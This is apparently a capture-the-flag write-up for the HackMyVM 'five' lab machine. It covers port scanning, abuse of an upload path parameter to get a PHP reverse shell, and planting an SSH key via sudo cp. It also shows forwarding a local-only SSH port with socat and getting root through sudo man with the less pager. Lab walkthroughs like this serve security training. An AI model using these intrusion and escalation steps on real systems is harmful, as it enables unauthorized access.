hack-my-vm-five

Port scan

kali@kali [~] ➜  sudo nmap -sT --min-rate 1000 -p- 192.168.1.12                                                                                  [21:05:24]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 21:08 CST
Nmap scan report for 192.168.1.12
Host is up (0.0020s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:E0:FD:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds

Only one port is open, 80.

Port 80

kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.12                                                                                           [20:08:03]
[sudo] password for kali:
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.12/_25-02-15_20-08-28.txt

Target: http://192.168.1.12/

[20:08:28] Starting:
[20:08:36] 200 - 6B - /3.php
[20:08:40] 301 - 185B - /admin -> http://192.168.1.12/admin/
[20:08:41] 200 - 4KB - /admin/
[20:08:41] 200 - 4KB - /admin/index.html
[20:09:27] 200 - 17B - /robots.txt
[20:09:37] 200 - 346B - /upload.html
[20:09:37] 200 - 48B - /upload.php
[20:09:37] 301 - 185B - /uploads -> http://192.168.1.12/uploads/

Quite a haul. I went to /admin first and tried brute-forcing the login and SQL injection, with no result; this felt like a file-upload box, so I set the login form aside for now.

Uploading an image straight away works and the file is served back, so the upload function itself is fine.

But an uploaded PHP file is not executed, which is bizarre: /uploads/ evidently serves .php as static content (most likely an nginx location rule for that directory).

Looking at the request, the destination path is a parameter we control. Leaving it empty makes the file land in the web root, where PHP is executed.

The upload succeeds; we request the file while listening for the reverse shell:

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [21:19:27]
listening on [any] 8888 ...
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.12] 46712
bash: cannot set terminal process group (334): Inappropriate ioctl for device
bash: no job control in this shell
www-data@five:~/html$ whoami
whoami
www-data
www-data@five:~/html$

Privilege escalation

www-data@five:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on five:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
(melisa) NOPASSWD: /bin/cp

cp can be run as melisa without a password, so we can copy our public key into melisa's home directory; unfortunately, port 22 is not open.

www-data@five:~/html$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 384/nginx: worker p
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 384/nginx: worker p
udp 0 0 0.0.0.0:68 0.0.0.0:* -
www-data@five:~/html$ nc 127.0.0.1 4444
nc 127.0.0.1 4444
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Port 4444 is listening on 127.0.0.1 only, and its banner shows it is SSH. Since it only accepts local connections, we forward it out; the forwarding command below came from GPT.

www-data@five:/tmp$ nohup socat TCP-LISTEN:3333,fork TCP:127.0.0.1:4444 &
nohup socat TCP-LISTEN:3333,fork TCP:127.0.0.1:4444 &
[1] 709
www-data@five:/tmp$

The forward is up.

www-data@five:/tmp$ cat x
cat x
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com
www-data@five:/tmp$ sudo -u melisa /bin/cp x /home/melisa/.ssh/authorized_keys
< melisa /bin/cp x /home/melisa/.ssh/authorized_keys

Copy done; since cp ran as melisa the new authorized_keys belongs to her, and we log in through the forwarded port.

kali@kali [~/.ssh] ➜  ssh melisa@192.168.1.12 -p 3333                                                                                            [21:39:49]
The authenticity of host '[192.168.1.12]:3333 ([192.168.1.12]:3333)' can't be established.
ED25519 key fingerprint is SHA256:tzDbg+Bz/dhZxOEC2UQ0V1lBWPCIPWOJ3tbX0VtJ5Vg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.12]:3333' (ED25519) to the list of known hosts.
Linux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 6 03:39:32 2020 from 192.168.1.58
melisa@five:~$ whoami
melisa
melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
(ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

Logged in successfully, and there are plenty of sudo entries that I think can be used for escalation.

SETENV is present, so in theory LD_PRELOAD / LD_LIBRARY_PATH escalation is possible, but I didn't try it at first since GTFOBins has a ready-made man escalation.

But man here would not run commands. I asked around: the trick needs less as the pager, and the box's default pager isn't less (man's -P switch forces one, which is what finally worked below). I did try LD_PRELOAD and it works; I didn't try the other one (LD_LIBRARY_PATH) because you have to find the library to hijack with ldd, which is too much hassle and may crash the program.

melisa@five:/tmp$ sudo /bin/man -P /usr/bin/less man
root@five:/tmp# whoami
root
root@five:/tmp#